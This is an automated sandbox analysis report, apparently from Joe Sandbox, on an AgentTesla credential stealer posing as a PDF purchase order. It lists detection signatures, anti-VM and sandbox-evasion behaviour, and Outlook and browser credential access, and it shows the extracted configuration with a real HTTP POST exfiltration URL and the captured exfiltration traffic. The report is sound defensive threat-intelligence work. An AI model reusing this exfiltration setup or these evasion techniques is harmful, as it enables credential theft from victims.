Loading ...

Play interactive tourEdit tour

Windows Analysis Report #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe

Overview

General Information

Sample Name:#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
Analysis ID:528513
MD5:7fb080a6aa45b1ac87c003e3f84a2983
SHA1:fa4a0744b0b1282e3f3c167773abcd50e806c133
SHA256:a1e613cf9bd9b9afbd51f0c2173cb71ddfdfecdc480b4dc8fc7571a41c90100d
Tags:AgentTeslaexe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "Http", "HTTP method": "Post", "Post URL": "https://www.mgbless.in/buzo/inc/a9e2f06d4bab2c.php", "User Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000000.658655936.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000005.00000000.658655936.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000005.00000002.915300159.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000005.00000002.915300159.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000005.00000002.916801544.0000000002E62000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 16 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.8.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.8.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.4294230.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.4294230.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 16 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.10.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Http", "HTTP method": "Post", "Post URL": "https://www.mgbless.in/buzo/inc/a9e2f06d4bab2c.php", "User Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"}
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: mgbless.inVirustotal: Detection: 5%Perma Link
                      Source: www.mgbless.inVirustotal: Detection: 7%Perma Link
                      Source: http://www.mgbless.inVirustotal: Detection: 7%Perma Link
                      Source: https://www.mgbless.in/buzo/inc/a9e2f06d4bab2c.phpVirustotal: Detection: 8%Perma Link
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.10.unpackAvira: Label: TR/Spy.Gen8
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.12.unpackAvira: Label: TR/Spy.Gen8
                      Source: 5.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: unknownHTTPS traffic detected: 104.223.93.105:443 -> 192.168.2.4:49779 version: TLS 1.2
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Joe Sandbox ViewIP Address: 104.223.93.105 104.223.93.105
                      Source: Joe Sandbox ViewIP Address: 104.223.93.105 104.223.93.105
                      Source: global trafficHTTP traffic detected: POST /buzo/inc/a9e2f06d4bab2c.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: www.mgbless.inContent-Length: 366Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /buzo/inc/a9e2f06d4bab2c.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: www.mgbless.inContent-Length: 362Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /buzo/inc/a9e2f06d4bab2c.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: www.mgbless.inContent-Length: 376Expect: 100-continueConnection: Keep-Alive
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmpString found in binary or memory: http://OcJtmX.com
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.917580598.00000000064F8000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916874458.0000000002EA6000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916631283.0000000002DDA000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916730583.0000000002E06000.00000004.00000001.sdmpString found in binary or memory: http://mgbless.in
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661006568.0000000003161000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916605594.0000000002DBC000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916874458.0000000002EA6000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916631283.0000000002DDA000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916730583.0000000002E06000.00000004.00000001.sdmpString found in binary or memory: http://www.mgbless.in
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916704934.0000000002DFB000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916605594.0000000002DBC000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916874458.0000000002EA6000.00000004.00000001.sdmpString found in binary or memory: https://www.mgbless.in
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916605594.0000000002DBC000.00000004.00000001.sdmpString found in binary or memory: https://www.mgbless.in/buzo/inc/a9e2f06d4bab2c.php
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmpString found in binary or memory: https://www.mgbless.in/buzo/inc/a9e2f06d4bab2c.php127.0.0.1POST
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916605594.0000000002DBC000.00000004.00000001.sdmpString found in binary or memory: https://www.mgbless.in4Xl
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916874458.0000000002EA6000.00000004.00000001.sdmpString found in binary or memory: https://www.mgbless.in4XlLm
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916730583.0000000002E06000.00000004.00000001.sdmpString found in binary or memory: https://www.mgbless.inD8Xl47
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661498626.000000000416D000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000000.658655936.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownHTTP traffic detected: POST /buzo/inc/a9e2f06d4bab2c.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: www.mgbless.inContent-Length: 366Expect: 100-continueConnection: Keep-Alive
                      Source: unknownDNS traffic detected: queries for: www.mgbless.in
                      Source: unknownHTTPS traffic detected: 104.223.93.105:443 -> 192.168.2.4:49779 version: TLS 1.2

                      System Summary:

                      barindex
                      Initial sample is a PE file and has a suspicious nameShow sources
                      Source: initial sampleStatic PE information: Filename: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: initial sampleStatic PE information: Filename: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      .NET source code contains very large array initializationsShow sources
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.10.unpack, u003cPrivateImplementationDetailsu003eu007b9AE5D3B4u002d2635u002d4821u002d844Au002d98E2A33766C9u007d/CD5F680Cu002dBDE0u002d494Bu002dB19Fu002dD0BFC7469809.csLarge array initialization: .cctor: array initializer size 11847
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007b9AE5D3B4u002d2635u002d4821u002d844Au002d98E2A33766C9u007d/CD5F680Cu002dBDE0u002d494Bu002dB19Fu002dD0BFC7469809.csLarge array initialization: .cctor: array initializer size 11847
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.8.unpack, u003cPrivateImplementationDetailsu003eu007b9AE5D3B4u002d2635u002d4821u002d844Au002d98E2A33766C9u007d/CD5F680Cu002dBDE0u002d494Bu002dB19Fu002dD0BFC7469809.csLarge array initialization: .cctor: array initializer size 11847
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.12.unpack, u003cPrivateImplementationDetailsu003eu007b9AE5D3B4u002d2635u002d4821u002d844Au002d98E2A33766C9u007d/CD5F680Cu002dBDE0u002d494Bu002dB19Fu002dD0BFC7469809.csLarge array initialization: .cctor: array initializer size 11847
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 0_2_01698250
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 0_2_0169D2E8
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_00E13C20
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_00E19D18
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_00E11270
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_00E133B8
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_00E1AB94
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_00E4B838
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_00E467C0
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_011646A0
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_0116465F
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_0116467F
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_0116DA00
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeBinary or memory string: OriginalFilename vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.663674311.0000000006710000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661006568.0000000003161000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661006568.0000000003161000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameGUdFRhHFLvYFZdmxEdTnFNkQg.exe4 vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661498626.000000000416D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameGUdFRhHFLvYFZdmxEdTnFNkQg.exe4 vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661498626.000000000416D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeBinary or memory string: OriginalFilename vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeBinary or memory string: OriginalFilename vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.915352748.0000000000438000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameGUdFRhHFLvYFZdmxEdTnFNkQg.exe4 vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.915560272.0000000000CF8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeBinary or memory string: OriginalFilenameDebugg.exe. vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeFile read: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe:Zone.IdentifierJump to behavior
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe "C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe"
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess created: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess created: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess created: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess created: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.logJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/1@6/2
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeMutant created: \Sessions\1\BaseNamedObjects\zvjPHYm
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeString found in binary or memory: /Debugg;component/views/addbook.xaml
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeString found in binary or memory: views/addcustomer.baml
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeString found in binary or memory: views/addbook.baml
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeString found in binary or memory: /Debugg;component/views/addcustomer.xaml
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeString found in binary or memory: /Debugg;component/views/addbook.xaml
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeString found in binary or memory: views/addbook.baml
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeString found in binary or memory: views/addcustomer.baml
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeString found in binary or memory: /Debugg;component/views/addcustomer.xaml
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeString found in binary or memory: /Debugg;component/views/addbook.xaml
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeString found in binary or memory: views/addbook.baml
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeString found in binary or memory: views/addcustomer.baml
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeString found in binary or memory: /Debugg;component/views/addcustomer.xaml
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeString found in binary or memory: I/Debugg;component/views/addbook.xaml_/Debugg;component/views/borrowfrombookview.xamlU/Debugg;component/views/borrowingview.xamlO/Debugg;component/views/changebook.xamlW/Debugg;component/views/changecustomer.xamlS/Debugg;component/views/customerview.xamlW/Debugg;component/views/deletecustomer.xamlM/Debugg;component/views/errorview.xamlQ/Debugg;component/views/smallextras.xamlQ/Debugg;component/views/addcustomer.xaml
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeString found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.10.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.10.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.4.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.4.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.8.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.8.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.df0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.df0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 3.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.3e0000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 3.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.3e0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 3.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.3e0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 3.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.3e0000.3.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 3.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.3e0000.2.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.11.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
